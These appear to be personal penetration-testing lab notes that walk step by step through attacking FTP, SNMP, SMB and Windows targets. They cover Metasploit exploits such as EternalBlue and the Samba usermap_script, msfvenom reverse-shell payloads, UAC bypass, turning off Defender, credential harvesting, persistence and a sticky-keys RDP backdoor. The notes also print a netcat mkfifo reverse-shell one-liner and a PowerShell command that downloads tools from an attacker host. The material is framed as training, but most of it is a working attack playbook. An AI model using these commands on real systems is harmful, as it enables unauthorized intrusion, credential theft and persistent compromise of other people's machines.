notes
ftp
ftp notes
what is ftp (file transfer protocal) ?
FTP, or File Transfer Protocol, is a method used to transfer files between computers over the internet.You can
use FTP to upload files to a website or download files from one,typically using special software called an FTP
client.
port: 21 (This is the command port, used for sending commands between the client and the server.)
note:Port 20 = Data transfer port in active mode FTP.
VERIFY THE FTP PORT IS OPEN/CLOSED BY
nmap -p 21 192.168.0.1
nmap -Pn -sV -sC -p 21 192.168.0.1 (for version scan and script scan of port 21)
check version of ftp server and “anonymous login is allowed or not”
1/43
� ANONYMOUS LOGIN OF FTP
if the ftp port 21 is opened and anonymous login is allowed then check below command for anonymos login
ftp 192.168.0.1
enter username as “anonymous” and password as “ anonymous”.
" check the login is successful or not"
EXPLOITING THE METESPLOITABLE2 VIA FTP AND ESTABLISH METERPRETER
SESSION
steps:
> search for version of ftp
> search for exploit over a internet
>use the exploit in msfconsole
>set rhosts
>upgrade the session to meterpreter
nmap -p 21 --script ftp-brute X.X.X.X
2/43
�using the exploit of ftp version
3/43
� upgrade the session to meterpreter session
SNMP
WHAT IS SNMP PROTOCAL?
Simple Network Management Protocol (SNMP) is an application layer protocol used for managing and
monitoring network devices, such as routers, switches, servers, and printers. It enables network administrators to
collect and organize information about networked devices and to modify device configurations remotely.
PORT: 161 (UDP PORT)
vulnerbilities:
• version 1 are more vulnerble camparing to the version 2
version3 is more secure . it is no vulnerble.
CHECK THE PORT DETAILS
nmap -p161 -sU -sV 115.74.195.118
4/43
�after getting nmap results search for snmp version and community details
SNMPWALK
snmpwalk -v1 -c public ip
# v for version
# c for community
check the results we get valid information of " OID (object identifiers) , MIB .. etc
SNMP-CHECK
snmp-check -v1 -c public -p 161 ip
5/43
�check the results:
we will get the information like
• system info , network info, network interfaces, routing information, ip address, tcp and udp listening informaiton,
storage information
SNMP ENUMERATION USING MSFCONSOLE
> msfconsole -q
> use auxiliary/scanner/snmp/snmp_enum
> options
> set rhosts ip
> run
check the results
6/43
�check the results.
SMB
WHAT IS SMB ?
SMB or Server Message Block is the modernized concept of what was used to known as
Common Internet File System. It works as an Application Layer Network Protocol. It is designed
to be used as a File Sharing Protocol. Different Applications can on a system can read and write
simultaneously to the files and request the server for services inside a network. One of the
interesting functionalities of SMB is that it can be run atop of its TCP/IP protocol or other network
protocols.
PORT : 445 /TCP
scan the smb port weather it is open or not
> nmap -p 445 -sV 192.168.0.2
7/43
�check the port state and the version of smb
SMB ANONYMOUS LOGIN USING “SMBCLIENT"
> smbclient -L target ip
check the sharename or folders “ check for tmp foldere because it has full access ”
to acces a folder use this command and dont enter any password just press enter
> smbclient //target/tmp
8/43
�we can upload and download file from the target
ANONYMOUS LOGIN USING “SMBMAP”
use the command
> smbmap -H target ip
9/43
�check the permissions the each folder only “tmp” as both read and write permissions
ANONYMOUS LOGIN USING “CRACKMAPEXEC”
use the command
> crackmapexec smb target
> crackmapexec smb target -u ‘ ‘ -p ’ ' --shares
check the results
anonymous login using “ enum4linux ”
use the command
> enum4linux target
10/43
�chck the results we can the information about target like nbstat scan, username , passeorg ..etc
SMB ANONYMOUS LOGIN USING “ MSFCONSOLE ”
in msfconsole
> check the version of smb through th nmap scan > nmap -p 445 -sV target
> search the version through online search and find the exploit
>in msfconsole " > use /exploit/multi/samba/usermap_script
> options
> set rhost 192.168.0.2 ( taget ip)
>run and bg
>use multi/handler
>sessions
> you will find the sone session upgrade it using > sessions -u 1
>you will get the meterpreter session
check the target ip and versions of the smb
11/43
�use the exploit
check
set rhost and rport and run the exploit and use the multi/handler
check the meterpreter sesssions
check
WINDOWS
12/43
�eternal blue
description :
The "EternalBlue" exploit, officially known as MS17-010, targets a vulnerability in Microsoft's Server Message
Block (SMB) protocol and was infamously used in large-scale cyber attacks like WannaCry. The Metasploit
Framework (MSF) provides a powerful environment for exploiting this vulnerability using the msfconsole
If successful, you’ll get a Meterpreter session, which provides a range of post-exploitation capabilities, such as:
• File system navigation
• Privilege escalation
• Dumping credentials (e.g., passwords)
• Keylogging or screenshot capture
note : it is only work on smb version 1
steps :
> check the weather smb port opened or not
> msfconole
> search eternal blue and use it
> set rhost (target)
> set payload windows/x64/meterpreter/reverse_tcp
> set lhost and lport (local)
• using the eternal blue
13/43
�*set rhost
• set lport and lhost
• set payload set payload windows/x64/meterpreter/reverse_tcp
getting meterpreter shell
taking the screen shot
14/43
�15/43
�16/43
�check
bypass_uac
description:
Privilege escalation using the "Bypass UAC" technique in Metasploit allows you to escalate privileges to SYSTEM or
an Administrator account from a lower-privileged context on Windows. Here's a step-by-step guide to perform
privilege escalation using the bypass UAC module in Metasploit:
Prerequisites:
• Low-privileged session: You should already have a foothold on the target system, such as a Meterpreter
session with low privileges.
• Windows machine: The target machine should be Windows, and User Account Control (UAC) should be
enabled.
• Metasploit framework installed on your attacker machine.
17/43
�steps:
>create a payload using
>msfvenom -p windows/meterpreter/reverse_tcp lhost=eth0 lport=1234 -f exe >a1.exe
>transfer the file to the target using python server
>msfconsole
>use /multi/handler
>set paylaod windows/meterpreter/reverse_tcp
>set lhost and lport
>run (run the payload in target machine and we will get meterpreter session with low previlege)
>background the session
>search bypass_uac (use fohelper)
>set session 1
>run
>sessions 1( type getuid we will get user level access only )
>getsystem( we wiil NT authority access)
• creating the payoad and transfering to target
• using multi handler and getting meterpreter session
• search for bypass_uac and use it
18/43
�• getting admin level access
• we can crack the hashes using https://crackstation.net/
check
19/43
�defender_bypass
disable the firewall using the group policy
steps:
>win+r (gpedit.msc)
>administrative templates >> windows components >> windows anti virus defender
>> enable “turn off defender”
password_change
description:
Metasploit Framework (MSF) is a powerful tool often used in penetration testing and security research.
MSFconsole, the command-line interface for the framework, offers the ability to interact with compromised
systems, including Windows machines. One common post-exploitation step is to retrieve and change passwords
1. Metasploit Framework Installed on Kali Linux or another pentesting distribution.
2. A target Windows machine vulnerable to exploitation.
3. An open session on the target machine (using any suitable exploit from Metasploit).
4. Basic understanding of post-exploitation and Windows authentication systems.
steps:
>open msfconsole
> open session on the target using any technique ( *using multi handler , * using eternal blue , )
>to know the password of target > use "hashdump" > use post/windows/gather/
phish_windows_credentials
>set session 1
>run(we will get password of target )
>now we have to change password
> use post/windows/manage/change_password msf post(change_password)
> set smbuser raj msf
> set old_password 123
> set new_password 987
> set session 1
> exploit
(we successfully changed the password of the target)
20/43
�21/43
�22/43
�check
persistance
description:
MSFconsole, the command-line interface of the Metasploit Framework, provides tools to establish persistence
on Windows systems. This allows the attacker to regain access to the system even after it has been rebooted or
the initial exploit session has ended.
This guide covers how to use Metasploit's post-exploitation features to establish persistence on a compromised
Windows machine.
Prerequisites:
1. Metasploit Framework Installed on a penetration testing system (e.g., Kali Linux).
2. A Windows system that has been successfully compromised using an exploit.
3. An active Meterpreter session on the target machine.
steps:
> msfcosole
>create a paylaod using “msfvenom -p windows/meterpreter/reverse_tcp lhost=eth0 lport=1234 -f exe >a.exe”
>get shell access using “ use /multi/handler”
>get previlege escalation using “bypass uac”
>use post/windows/manage/persistence
>set session
>set REXENAME and REXEPATH
>run
>whenever the target system get restarted we will get session again
23/43
�24/43
�check
rdesktop
description:
In penetration testing, exploiting vulnerabilities in remote desktop services, such as those provided by rdesktop
or Windows Remote Desktop Protocol (RDP), can lead to unauthorized access to systems. MSFconsole, the
command-line interface of the Metasploit Framework, offers powerful modules to target weaknesses in RDP
implementations. This guide provides a step-by-step approach to exploiting vulnerabilities in RDP services on a
Windows machine using MSFconsole.
steps:
>msfconsole
>create a paylaod using “msfvenom -p windows/meterpreter/reverse_tcp lhost=eth0 lport=1234 -f exe >a.exe”
>use /mutli/handler/ (get the shell acces by running the payload on target machine)
>>get previlege escalation using “bypass uac”
25/43
�>after getting NT AUTHORITY session
>search enable rdp (use it)
>set session (run it)
>search sticky (use it )
>set session
>run
note: change the remote desktop setting in control panel and uncheck in the select the user who can use
remote desktop
>nmap -p3389 192.168.132.195 (to check rdp port opened or not)
>rdesktop 192.168.132.195 (we will get remote desktop access)
>enter 5 times shift key
26/43
�27/43
�28/43
�*if we know the user and password we can acces the remote desktop
check
29/43
�NMAP
NMAP SCRIPT
WHAT IS SCRIPT SCAN?
Nmap Scripts (NSE - Nmap Scripting Engine)
Nmap includes a powerful feature called the Nmap Scripting Engine (NSE), which allows users to write and use
scripts to automate tasks related to network discovery, vulnerability detection, and exploitation. NSE scripts
extend Nmap's capabilities beyond simple port scanning, allowing for deeper analysis of network services.
> nmap --script <script _name> target
TO find all nmap script
> cd /usr/share/nmap/scripts
> nmap --script=smb-double-pulsar-backdoor.nse 192.168.0.7 -p 445 -Pn
--script is for script scan
30/43
�> nmap --script=smb* -p 445 192.168.0.7
to scan all the scripts for smb
> nmap --script=smb-double-pulsar-backdoor.nse 192.168.0.7 -p 445 -Pn
>nmap --script=vuln 192.168.0.7 -p 445
31/43
�check
Linux privilege escalation
Linux Root Privilege Escalation: A Brief Overview
Root Privilege Escalation refers to the process where a user or an attacker gains elevated access, typically root
(administrator) privileges, from a lower-privileged account. This is a critical security issue as it allows full control
over the system.
Common Methods of Root Privilege Escalation:
•1 Kernel Exploits:
Vulnerabilities in the Linux Kernel: Exploiting bugs in the kernel can allow attackers to run arbitrary code with
root privileges.
2SUID (Set-User-ID) Programs:
• SUID programs run with the privileges of the file owner (often root). If misconfigured or vulnerable, these can be
exploited for privilege escalation.
3.Weak File Permissions:
• Misconfigured permissions on critical files (like /etc/passwd or /etc/shadow) may allow unauthorized
access or modifications, leading to root privilege.
Poor sudo Configuration:
• Misconfigurations in /etc/sudoers or unrestricted use of the sudo command may allow privilege escalation
encrpted reverse shell
WHAT IS REVERSE SHELL ?
32/43
�A reverse shell is a type of network connection that allows an external attacker to gain remote control over a
target machine. In this setup, instead of the attacker directly connecting to the target (which might be protected
by a firewall), the target machine initiates a connection back to the attacker's machine. This reversal is why it's
called a "reverse" shell.
WHAT IS AN ENCRYPTED SHELL ?
An encrypted shell refers to a secure communication channel between two systems, typically used for remote
administration, where data transmitted over the shell is encrypted to prevent unauthorized access and
eavesdropping. This type of shell ensures that the commands, responses, and any other data shared during a
remote session remain confidentia
NETCAT REVERSE SHELL
let the kali ip be 192.168.0.5
let the ubuntu ip be 192.168.0.6
use the pay load and run it on the target machine ubuntu
> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.5 1234 >/tmp/f ( the mention ip is kali ip i.e
attackers ip)
let run the netcat listener in the kali machine
> nc -lvp 1234
33/43
�check the results on wire shark
check
WINDOWS
WEB_DELIVERY
34/43
�getting the powershell acces using web_delivery exploit
STEPS:
> msfconsole -q
> search web_delivery and use it
>set lhost
> set target PSH\ (Binary)
>set payload windows/powershell_reverse_tcp
>advanced
>set PSH-EncodedCommand false
>run
> we will get payload paste it in the cmd in the windows , after that we will get powershell access
35/43
�check
misconfiguration
About the misconfiguration
When the “Always install with elevated privileges” setting is enabled, it allows Windows
Installer packages (.msi files) to be installed with administrative privileges by any user,
including those with limited permissions. This feature is intended for ease of software
deployment in enterprise environments but can be exploited by malicious users to gain elevated
access to the system.
steps:
>gpedit.msc in run dialog box (crtl + R)
>administrative template >> windows components>> always install with elevated previleges >> enabled
>open cmd
>gpupdate /force
>create a payload using revshell to powershell
>nc -lvnp 8000
>enter the below commands
>reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
>reg query HKLM\Software\Policies\Microsoft\Windows\Installer
36/43
�37/43
�38/43
�39/43
�check
winpeas
description:
the process of leveraging WinPEAS, a popular privilege escalation tool for Windows, to discover system
vulnerabilities or misconfigurations that can be exploited to obtain an encrypted reverse shell on a compromised
machine.
steps:
40/43
�method1:
> open revshell
>create payload for powershell
>run the payload in powershell
>in kali use >> nc -lvnp 8000 (we will get shell access)
> run the winpeas.exe in shell using >> ./winPEASx64.exe
41/43
�method2:
>use msfvenom -p windows/meterpreter/reverse_tcp lhost=eth0 lport=1234 -f exe > a.exe
>upload the payload to target via python server
>msfconsole
>use /multi/handler
>set payload windows/meterpreter/reverse_tcp
>set lhost and lport
>run (we will get meterpreter session )
>upload the winpeas in cmd via python server
>powershell.exe wget http://192.168.132.142:80/winPEASx64.exe -o winPEASx64.exe
>winPEASx64.exe
42/43
�check
43/43
